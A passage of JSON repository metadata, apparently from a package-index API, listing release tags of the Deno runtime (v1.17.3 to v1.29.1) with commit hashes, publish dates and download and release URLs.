https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"de